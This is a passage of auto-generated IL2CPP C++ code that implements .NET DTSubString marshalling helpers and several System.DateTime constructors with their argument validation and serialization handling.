DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D& unmarshaled) { unmarshaled.set_s_0(il2cpp_codegen_marshal_string_result(marshaled.___s_0)); int32_t unmarshaled_index_temp_1 = 0; unmarshaled_index_temp_1 = marshaled.___index_1; unmarshaled.set_index_1(unmarshaled_index_temp_1); int32_t unmarshaled_length_temp_2 = 0; unmarshaled_length_temp_2 = marshaled.___length_2; unmarshaled.set_length_2(unmarshaled_length_temp_2); int32_t unmarshaled_type_temp_3 = 0; unmarshaled_type_temp_3 = marshaled.___type_3; unmarshaled.set_type_3(unmarshaled_type_temp_3); int32_t unmarshaled_value_temp_4 = 0; unmarshaled_value_temp_4 = marshaled.___value_4; unmarshaled.set_value_4(unmarshaled_value_temp_4); } // Conversion method for clean up from marshalling of: System.DTSubString extern "C" void DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshal_pinvoke_cleanup(DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshaled_pinvoke& marshaled) { il2cpp_codegen_marshal_free(marshaled.___s_0); marshaled.___s_0 = NULL; } // Conversion methods for marshalling of: System.DTSubString extern "C" void DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshal_com(const DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D& unmarshaled, DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshaled_com& marshaled) { marshaled.___s_0 = il2cpp_codegen_marshal_bstring(unmarshaled.get_s_0()); marshaled.___index_1 = unmarshaled.get_index_1(); marshaled.___length_2 = unmarshaled.get_length_2(); marshaled.___type_3 = unmarshaled.get_type_3(); marshaled.___value_4 = unmarshaled.get_value_4(); } extern "C" void DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshal_com_back(const DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshaled_com& marshaled, DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D& unmarshaled) { unmarshaled.set_s_0(il2cpp_codegen_marshal_bstring_result(marshaled.___s_0)); int32_t unmarshaled_index_temp_1 = 0; unmarshaled_index_temp_1 = marshaled.___index_1; unmarshaled.set_index_1(unmarshaled_index_temp_1); int32_t unmarshaled_length_temp_2 = 0; unmarshaled_length_temp_2 = marshaled.___length_2; unmarshaled.set_length_2(unmarshaled_length_temp_2); int32_t unmarshaled_type_temp_3 = 0; unmarshaled_type_temp_3 = marshaled.___type_3; unmarshaled.set_type_3(unmarshaled_type_temp_3); int32_t unmarshaled_value_temp_4 = 0; unmarshaled_value_temp_4 = marshaled.___value_4; unmarshaled.set_value_4(unmarshaled_value_temp_4); } // Conversion method for clean up from marshalling of: System.DTSubString extern "C" void DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshal_com_cleanup(DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshaled_com& marshaled) { il2cpp_codegen_marshal_free_bstring(marshaled.___s_0); marshaled.___s_0 = NULL; } // System.Char System.DTSubString::get_Item(System.Int32) extern "C" IL2CPP_METHOD_ATTR Il2CppChar DTSubString_get_Item_mD569E347AE9009D19F72CF9A6AD2B202C9133F99 (DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D * __this, int32_t ___relativeIndex0, const RuntimeMethod* method) { { String_t* L_0 = __this->get_s_0(); int32_t L_1 = __this->get_index_1(); int32_t L_2 = ___relativeIndex0; Il2CppChar L_3 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_0, ((int32_t)il2cpp_codegen_add((int32_t)L_1, (int32_t)L_2)), /*hidden argument*/NULL); return L_3; } } extern "C" Il2CppChar DTSubString_get_Item_mD569E347AE9009D19F72CF9A6AD2B202C9133F99_AdjustorThunk (RuntimeObject * __this, int32_t ___relativeIndex0, const RuntimeMethod* method) { DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D * _thisAdjusted = reinterpret_cast<DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D *>(__this + 1); return DTSubString_get_Item_mD569E347AE9009D19F72CF9A6AD2B202C9133F99(_thisAdjusted, ___relativeIndex0, method); } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.DateTime::.ctor(System.Int64) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_m027A935E14EB81BCC0739BD56AE60CDE3387990C (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int64_t ___ticks0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime__ctor_m027A935E14EB81BCC0739BD56AE60CDE3387990C_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int64_t L_0 = ___ticks0; if ((((int64_t)L_0) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_0011; } } { int64_t L_1 = ___ticks0; if ((((int64_t)L_1) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_0026; } } IL_0011: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral7DA9F73A36ABE2E58D56D121E5A7E2C3CF329C27, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_3 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_3, _stringLiteral5F82205BEDF93F9FC5534E27F6D5798CA8E49C9A, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, DateTime__ctor_m027A935E14EB81BCC0739BD56AE60CDE3387990C_RuntimeMethod_var); } IL_0026: { int64_t L_4 = ___ticks0; __this->set_dateData_44(L_4); return; } } extern "C" void DateTime__ctor_m027A935E14EB81BCC0739BD56AE60CDE3387990C_AdjustorThunk (RuntimeObject * __this, int64_t ___ticks0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); DateTime__ctor_m027A935E14EB81BCC0739BD56AE60CDE3387990C(_thisAdjusted, ___ticks0, method); } // System.Void System.DateTime::.ctor(System.UInt64) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_m93DC89CED5AEEF1BFE4F5C194F2E36CB2C7F043E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, uint64_t ___dateData0, const RuntimeMethod* method) { { uint64_t L_0 = ___dateData0; __this->set_dateData_44(L_0); return; } } extern "C" void DateTime__ctor_m93DC89CED5AEEF1BFE4F5C194F2E36CB2C7F043E_AdjustorThunk (RuntimeObject * __this, uint64_t ___dateData0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); DateTime__ctor_m93DC89CED5AEEF1BFE4F5C194F2E36CB2C7F043E(_thisAdjusted, ___dateData0, method); } // System.Void System.DateTime::.ctor(System.Int64,System.DateTimeKind) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int64_t ___ticks0, int32_t ___kind1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int64_t L_0 = ___ticks0; if ((((int64_t)L_0) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_0011; } } { int64_t L_1 = ___ticks0; if ((((int64_t)L_1) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_0026; } } IL_0011: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral7DA9F73A36ABE2E58D56D121E5A7E2C3CF329C27, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_3 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_3, _stringLiteral5F82205BEDF93F9FC5534E27F6D5798CA8E49C9A, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F_RuntimeMethod_var); } IL_0026: { int32_t L_4 = ___kind1; if ((((int32_t)L_4) < ((int32_t)0))) { goto IL_002e; } } { int32_t L_5 = ___kind1; if ((((int32_t)L_5) <= ((int32_t)2))) { goto IL_0043; } } IL_002e: { String_t* L_6 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral82237410ED07589538EA563BE12E6D18D81CA295, /*hidden argument*/NULL); ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 * L_7 = (ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 *)il2cpp_codegen_object_new(ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1_il2cpp_TypeInfo_var); ArgumentException__ctor_m26DC3463C6F3C98BF33EA39598DD2B32F0249CA8(L_7, L_6, _stringLiteral0EF25AE00F40C8471EE44B720036ABCC25E96CEE, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_7, NULL, DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F_RuntimeMethod_var); } IL_0043: { int64_t L_8 = ___ticks0; int32_t L_9 = ___kind1; __this->set_dateData_44(((int64_t)((int64_t)L_8|(int64_t)((int64_t)((int64_t)(((int64_t)((int64_t)L_9)))<<(int32_t)((int32_t)62)))))); return; } } extern "C" void DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F_AdjustorThunk (RuntimeObject * __this, int64_t ___ticks0, int32_t ___kind1, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F(_thisAdjusted, ___ticks0, ___kind1, method); } // System.Void System.DateTime::.ctor(System.Int64,System.DateTimeKind,System.Boolean) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_m8946C6F0EFB7933840C449A2C859B08101393A84 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int64_t ___ticks0, int32_t ___kind1, bool ___isAmbiguousDst2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime__ctor_m8946C6F0EFB7933840C449A2C859B08101393A84_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t G_B5_0 = 0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * G_B5_1 = NULL; int64_t G_B4_0 = 0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * G_B4_1 = NULL; int64_t G_B6_0 = 0; int64_t G_B6_1 = 0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * G_B6_2 = NULL; { int64_t L_0 = ___ticks0; if ((((int64_t)L_0) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_0011; } } { int64_t L_1 = ___ticks0; if ((((int64_t)L_1) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_0026; } } IL_0011: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral7DA9F73A36ABE2E58D56D121E5A7E2C3CF329C27, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_3 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_3, _stringLiteral5F82205BEDF93F9FC5534E27F6D5798CA8E49C9A, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, DateTime__ctor_m8946C6F0EFB7933840C449A2C859B08101393A84_RuntimeMethod_var); } IL_0026: { int64_t L_4 = ___ticks0; bool L_5 = ___isAmbiguousDst2; G_B4_0 = L_4; G_B4_1 = __this; if (L_5) { G_B5_0 = L_4; G_B5_1 = __this; goto IL_0036; } } { G_B6_0 = ((int64_t)std::numeric_limits<int64_t>::min()); G_B6_1 = G_B4_0; G_B6_2 = G_B4_1; goto IL_003f; } IL_0036: { G_B6_0 = ((int64_t)-4611686018427387904LL); G_B6_1 = G_B5_0; G_B6_2 = G_B5_1; } IL_003f: { G_B6_2->set_dateData_44(((int64_t)((int64_t)G_B6_1|(int64_t)G_B6_0))); return; } } extern "C" void DateTime__ctor_m8946C6F0EFB7933840C449A2C859B08101393A84_AdjustorThunk (RuntimeObject * __this, int64_t ___ticks0, int32_t ___kind1, bool ___isAmbiguousDst2, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); DateTime__ctor_m8946C6F0EFB7933840C449A2C859B08101393A84(_thisAdjusted, ___ticks0, ___kind1, ___isAmbiguousDst2, method); } // System.Void System.DateTime::.ctor(System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_mF4506D7FF3B64F7EC739A36667DC8BC089A6539A (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int32_t ___year0, int32_t ___month1, int32_t ___day2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime__ctor_mF4506D7FF3B64F7EC739A36667DC8BC089A6539A_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___year0; int32_t L_1 = ___month1; int32_t L_2 = ___day2; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); int64_t L_3 = DateTime_DateToTicks_m8315FA4947393A7ABDB9A9905EE6B0F11ECC6A64(L_0, L_1, L_2, /*hidden argument*/NULL); __this->set_dateData_44(L_3); return; } } extern "C" void DateTime__ctor_mF4506D7FF3B64F7EC739A36667DC8BC089A6539A_AdjustorThunk (RuntimeObject * __this, int32_t ___year0, int32_t ___month1, int32_t ___day2, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); DateTime__ctor_mF4506D7FF3B64F7EC739A36667DC8BC089A6539A(_thisAdjusted, ___year0, ___month1, ___day2, method); } // System.Void System.DateTime::.ctor(System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_m6567CDEB97E6541CE4AF8ADDC617CFF419D5A58E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int32_t ___year0, int32_t ___month1, int32_t ___day2, int32_t ___hour3, int32_t ___minute4, int32_t ___second5, int32_t ___millisecond6, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime__ctor_m6567CDEB97E6541CE4AF8ADDC617CFF419D5A58E_MetadataUsageId); s_Il2CppMethodInitialized = true; } int64_t V_0 = 0; { int32_t L_0 = ___millisecond6; if ((((int32_t)L_0) < ((int32_t)0))) { goto IL_000e; } } { int32_t L_1 = ___millisecond6; if ((((int32_t)L_1) < ((int32_t)((int32_t)1000)))) { goto IL_003f; } } IL_000e: { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_3 = L_2; int32_t L_4 = 0; RuntimeObject * L_5 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_4); ArrayElementTypeCheck (L_3, L_5); (L_3)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)L_5); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_6 = L_3; int32_t L_7 = ((int32_t)999); RuntimeObject * L_8 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_7); ArrayElementTypeCheck (L_6, L_8); (L_6)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)L_8); String_t* L_9 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralA980EEDA49322EB9BE88B6480B2BE63B70186B1E, L_6, /*hidden argument*/NULL); ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_10 = (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)il2cpp_codegen_object_new(ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var); ArgumentOutOfRangeException__ctor_m300CE4D04A068C209FD858101AC361C1B600B5AE(L_10, _stringLiteral7779E9DF0BDDB39AD9871F3D3FAF9F9C59A62C5B, L_9, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_10, NULL, DateTime__ctor_m6567CDEB97E6541CE4AF8ADDC617CFF419D5A58E_RuntimeMethod_var); } IL_003f: { int32_t L_11 = ___year0; int32_t L_12 = ___month1; int32_t L_13 = ___day2; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); int64_t L_14 = DateTime_DateToTicks_m8315FA4947393A7ABDB9A9905EE6B0F11ECC6A64(L_11, L_12, L_13, /*hidden argument*/NULL); int32_t L_15 = ___hour3; int32_t L_16 = ___minute4; int32_t L_17 = ___second5; int64_t L_18 = DateTime_TimeToTicks_m38671AD5E9A1A1DE63AF5BAC980B0A0E8E67A5DB(L_15, L_16, L_17, /*hidden argument*/NULL); V_0 = ((int64_t)il2cpp_codegen_add((int64_t)L_14, (int64_t)L_18)); int64_t L_19 = V_0; int32_t L_20 = ___millisecond6; V_0 = ((int64_t)il2cpp_codegen_add((int64_t)L_19, (int64_t)((int64_t)il2cpp_codegen_multiply((int64_t)(((int64_t)((int64_t)L_20))), (int64_t)(((int64_t)((int64_t)((int32_t)10000)))))))); int64_t L_21 = V_0; if ((((int64_t)L_21) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_0072; } } { int64_t L_22 = V_0; if ((((int64_t)L_22) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_0082; } } IL_0072: { String_t* L_23 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral8982655AE29E9D3137AA597B404ACE4E0F6B958F, /*hidden argument*/NULL); ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 * L_24 = (ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 *)il2cpp_codegen_object_new(ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1_il2cpp_TypeInfo_var); ArgumentException__ctor_m9A85EF7FEFEC21DDD525A67E831D77278E5165B7(L_24, L_23, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_24, NULL, DateTime__ctor_m6567CDEB97E6541CE4AF8ADDC617CFF419D5A58E_RuntimeMethod_var); } IL_0082: { int64_t L_25 = V_0; __this->set_dateData_44(L_25); return; } } extern "C" void DateTime__ctor_m6567CDEB97E6541CE4AF8ADDC617CFF419D5A58E_AdjustorThunk (RuntimeObject * __this, int32_t ___year0, int32_t ___month1, int32_t ___day2, int32_t ___hour3, int32_t ___minute4, int32_t ___second5, int32_t ___millisecond6, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); DateTime__ctor_m6567CDEB97E6541CE4AF8ADDC617CFF419D5A58E(_thisAdjusted, ___year0, ___month1, ___day2, ___hour3, ___minute4, ___second5, ___millisecond6, method); } // System.Void System.DateTime::.ctor(System.Runtime.Serialization.SerializationInfo,System.Runtime.Serialization.StreamingContext) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_m399F434D85D918405F74C5B04BCBD8C1B410F10E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * ___info0, StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034 ___context1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime__ctor_m399F434D85D918405F74C5B04BCBD8C1B410F10E_MetadataUsageId); s_Il2CppMethodInitialized = true; } bool V_0 = false; bool V_1 = false; int64_t V_2 = 0; uint64_t V_3 = 0; SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5 * V_4 = NULL; int64_t V_5 = 0; String_t* V_6 = NULL; { SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * L_0 = ___info0; if (L_0) { goto IL_000e; } } { ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * L_1 = (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD *)il2cpp_codegen_object_new(ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_il2cpp_TypeInfo_var); ArgumentNullException__ctor_mEE0C0D6FCB2D08CD7967DBB1329A0854BBED49ED(L_1, _stringLiteral59BD0A3FF43B32849B319E645D4798D8A5D1E889, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, DateTime__ctor_m399F434D85D918405F74C5B04BCBD8C1B410F10E_RuntimeMethod_var); } IL_000e: { V_0 = (bool)0; V_1 = (bool)0; V_2 = (((int64_t)((int64_t)0))); V_3 = (((int64_t)((int64_t)0))); SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * L_2 = ___info0; SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5 * L_3 = SerializationInfo_GetEnumerator_m9796C5CB43B69B5236D530A547A4FC24ABB0B575(L_2, /*hidden argument*/NULL); V_4 = L_3; goto IL_0073; } IL_0022: { SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5 * L_4 = V_4; String_t* L_5 = SerializationInfoEnumerator_get_Name_m925E3C668A70982F88C8EBEEB86BA0D45B71857E(L_4, /*hidden argument*/NULL); V_6 = L_5; String_t* L_6 = V_6; bool L_7 = String_op_Equality_m139F0E4195AE2F856019E63B241F36F016997FCE(L_6, _stringLiteral5F82205BEDF93F9FC5534E27F6D5798CA8E49C9A, /*hidden argument*/NULL); if (L_7) { goto IL_0049; } } { String_t* L_8 = V_6; bool L_9 = String_op_Equality_m139F0E4195AE2F856019E63B241F36F016997FCE(L_8, _stringLiteral8D475FBD52CC44C4B3646CB6D42B92B682940C75, /*hidden argument*/NULL); if (L_9) { goto IL_005f; } } { goto IL_0073; } IL_0049: { SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5 * L_10 = V_4; RuntimeObject * L_11 = SerializationInfoEnumerator_get_Value_m90F91B3AFD43BA00E4A69FC0954761CFD9C55AE1(L_10, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_12 = CultureInfo_get_InvariantCulture_mF13B47F8A763CE6A9C8A8BB2EED33FF8F7A63A72(/*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); int64_t L_13 = Convert_ToInt64_m8964FDE5D82FEC54106DBF35E1F67D70F6E73E29(L_11, L_12, /*hidden argument*/NULL); V_2 = L_13; V_0 = (bool)1; goto IL_0073; } IL_005f: { SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5 * L_14 = V_4; RuntimeObject * L_15 = SerializationInfoEnumerator_get_Value_m90F91B3AFD43BA00E4A69FC0954761CFD9C55AE1(L_14, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_16 = CultureInfo_get_InvariantCulture_mF13B47F8A763CE6A9C8A8BB2EED33FF8F7A63A72(/*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); uint64_t L_17 = Convert_ToUInt64_mA8C3C5498FC28CBA0EB0C37409EB9E04CCF6B8D2(L_15, L_16, /*hidden argument*/NULL); V_3 = L_17; V_1 = (bool)1; } IL_0073: { SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5 * L_18 = V_4; bool L_19 = SerializationInfoEnumerator_MoveNext_m74D8DE9528E7DDD141DD45ABF4B54F832DE35701(L_18, /*hidden argument*/NULL); if (L_19) { goto IL_0022; } } { bool L_20 = V_1; if (!L_20) { goto IL_0088; } } { uint64_t L_21 = V_3; __this->set_dateData_44(L_21); goto IL_00a4; } IL_0088: { bool L_22 = V_0; if (!L_22) { goto IL_0094; } } { int64_t L_23 = V_2; __this->set_dateData_44(L_23); goto IL_00a4; } IL_0094: { String_t* L_24 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral60C475AA86353C499DE2FA8877E87D44031CE593, /*hidden argument*/NULL); SerializationException_tA1FDFF6779406E688C2192E71C38DBFD7A4A2210 * L_25 = (SerializationException_tA1FDFF6779406E688C2192E71C38DBFD7A4A2210 *)il2cpp_codegen_object_new(SerializationException_tA1FDFF6779406E688C2192E71C38DBFD7A4A2210_il2cpp_TypeInfo_var); SerializationException__ctor_m88AAD9671030A8A96AA87CB95701938FBD8F16E1(L_25, L_24, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_25, NULL, DateTime__ctor_m399F434D85D918405F74C5B04BCBD8C1B410F10E_RuntimeMethod_var); } IL_00a4: { int64_t L_26 = DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)__this, /*hidden argument*/NULL); V_5 = L_26; int64_t L_27 = V_5; if ((((int64_t)L_27) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_00bf; } } { int64_t L_28 = V_5; if ((((int64_t)L_28) <= ((int64_t)((int64_t)3155378975999999999LL)))) { goto IL_00cf; } } IL_00bf: { String_t* L_29 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral01A3CEF9C82C7345C59662510E0B421C6A6BDCFD, /*hidden argument*/NULL); SerializationException_tA1FDFF6779406E688C2192E71C38DBFD7A4A2210 * L_30 = (SerializationException_tA1FDFF6779406E688C2192E71C38DBFD7A4A2210 *)il2cpp_codegen_object_new(SerializationException_tA1FDFF6779406E688C2192E71C38DBFD7A4A2210_il2cpp_TypeInfo_var); SerializationException__ctor_m88AAD9671030A8A96AA87CB95701938FBD8F16E1(L_30, L_29, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_30, NULL, DateTime__ctor_m399F434D85D918405F74C5B04BCBD8C1B410F10E_RuntimeMethod_var); } IL_00cf: { return; } } extern "C" void 